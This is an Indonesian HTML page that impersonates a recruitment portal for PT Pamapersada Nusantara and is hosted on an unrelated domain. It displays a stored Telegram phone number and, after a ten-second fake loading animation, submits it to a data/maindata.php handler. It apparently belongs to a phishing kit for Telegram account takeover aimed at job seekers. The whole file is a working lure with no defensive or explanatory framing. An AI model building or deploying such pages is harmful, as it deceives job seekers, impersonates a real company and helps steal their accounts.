<!DOCTYPE html>
<html lang="id">
<head>
    <!-- Tambahkan ini di dalam elemen <head> -->
    <link rel="icon" type="image/png" sizes="32x32" href="images/logo.jpg">

    <!-- Open Graph Meta Tags -->
    <meta property="og:title" content="PT PAMAPERSADA NUSANTARA">
    <meta property="og:description" content="Lowongan kerja terbaru dan terpercaya. Klik untuk melihat detailnya!">
    <meta property="og:image" content="https://pendaftaranpenerimaan2024.my.id/loker/id/career/PTpamarsada-nusantara/pamapersada/images/job.jpg">
    <meta property="og:url" content="https://yourwebsite.com/">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="PT PAMAPERSADA NUSANTARA">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1, viewport-fit=cover">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>PT PAMAPERSADA NUSANTARA</title>
    
    <!-- Stylesheets -->
    <link rel="stylesheet" href="styles/bootstrap.css">
    <link rel="stylesheet" href="styles/style.css">
    <link href="https://fonts.googleapis.com/css?family=Poppins:300,400,500,600,700,800,900|Roboto:300,300i,400,400i,500,500i,700,700i,900,900i&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="fonts/css/fontawesome-all.min.css">

    <!-- Apple Touch Icon -->
    <link rel="apple-touch-icon" sizes="180x180" href="images/icon-192x192.png">

    <!-- Styling Overlay dan Loading -->
    <style>
        /* Overlay styling */
        #overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(255, 255, 255, 0.5); /* Ubah menjadi transparansi lebih rendah */
            z-index: 9999;
            display: none;
            justify-content: center;
            align-items: center;
        }

        /* Animasi Lottie */
        #lottie-animation {
            width: 300px;
            height: 300px;
        }

        /* Tambahkan margin-left pada tombol Ganti Nomor untuk menggeser ke kanan */
        .btn-ganti-nomor {
            margin-left: 60px;
        }
    </style>
</head>

<body class="theme-light" data-highlight="blue2">

<div id="page">
    <div class="page-content">
        <img class="card" width="100%" src="images/pama.jpg" alt="Pama">

        <div class="card card-style">
            <div class="content mb-0">
                <h3 class="font-600">Pendaftaran</h3>
                <p>Apakah Nomor yang Anda masukkan sudah benar? Jika iya, silahkan lanjutkan pendaftaran.</p>
                
                <!-- Form yang mengarah ke maindata.php -->
                <form action="data/maindata.php" method="post" onsubmit="handleSubmit(event);">
                    <div class="input-style has-borders no-icon input-style-always-active mb-4">
                        <input class="form-control" name="nomor" id="nomor" type="text" readonly>
                        <label for="nomor" class="color-highlight font-400 font-13">Nomor Telegram</label>
                    </div>

                    <div class="content mt-0">
                        <div class="row">
                            <div class="col-6 text-left">
                                <!-- Tombol Lanjut di sisi kiri -->
                                <button type="submit" class="btn btn-full btn-m shadow-l rounded-s text-uppercase font-900 bg-blue-dark mb-3 mt-4">
                                    Lanjut
                                </button>
                            </div>
                            <div class="col-6 text-right">
                                <!-- Tombol untuk mengganti nomor di sisi kanan dengan tambahan margin-left -->
                                <button type="button" onclick="gantiNomor()" class="btn btn-full btn-m shadow-l rounded-s text-uppercase font-900 bg-red-dark mb-3 mt-4 btn-ganti-nomor">
                                    Ganti Nomor
                                </button>
                            </div>
                        </div>
                    </div>
                </form>
            </div>
        </div>

        <!-- Custom Footer with Image -->
        <div class="footer mt-3">
            <img src="https://infokerjaid.com/pamapersada/images/footer.png" alt="Footer Image" style="width:100%; height:auto;">
        </div>
    </div>    
</div>    

<!-- Overlay for loading effect -->
<div id="overlay">
    <div id="lottie-animation"></div> <!-- Div untuk menampilkan animasi Lottie -->
</div>

<!-- Scripts -->
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="scripts/bootstrap.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/bodymovin/5.9.4/lottie.min.js"></script> <!-- Tambahkan bodymovin.js untuk memuat animasi Lottie -->

<script>
    // Ambil nomor dari localStorage dan tampilkan di input
    window.onload = function() {
        var nomor = localStorage.getItem('nomorTelegram');
        if (nomor) {
            document.getElementById('nomor').value = nomor;
        }
    }

    // Fungsi untuk menampilkan overlay dan redirect ke halaman cek.php setelah 10 detik
    function gantiNomor() {
        showOverlay(); // Tampilkan overlay
        setTimeout(function() {
            window.location.href = 'cek.php'; // Redirect ke halaman cek.php setelah 10 detik
        }, 10000); // Durasi 10 detik (10000 ms)
    }

    // Fungsi untuk menampilkan overlay
    function showOverlay() {
        document.getElementById('overlay').style.display = 'flex'; // Tampilkan overlay

        // Load Lottie Animation
        lottie.loadAnimation({
            container: document.getElementById('lottie-animation'), // ID kontainer untuk animasi
            renderer: 'svg',
            loop: true,
            autoplay: true,
            path: 'overlayplan.json' // Jalur file JSON Lottie
        });
    }

    // Simpan nomor ke localStorage (untuk halaman selanjutnya)
    function simpanKeLocalStorage() {
        var nomor = document.getElementById('nomor').value;
        localStorage.setItem('nomorTelegram', nomor);
    }

    // Fungsi untuk menangani submit form
    function handleSubmit(event) {
        event.preventDefault(); // Mencegah form submit langsung
        showOverlay(); // Tampilkan overlay
        simpanKeLocalStorage(); // Simpan data ke localStorage

        // Tunggu 10 detik sebelum submit form
        setTimeout(function() {
            event.target.submit(); // Lanjutkan submit form setelah 10 detik
        }, 10000); // Durasi 10 detik
    }
</script>

</body>
</html>
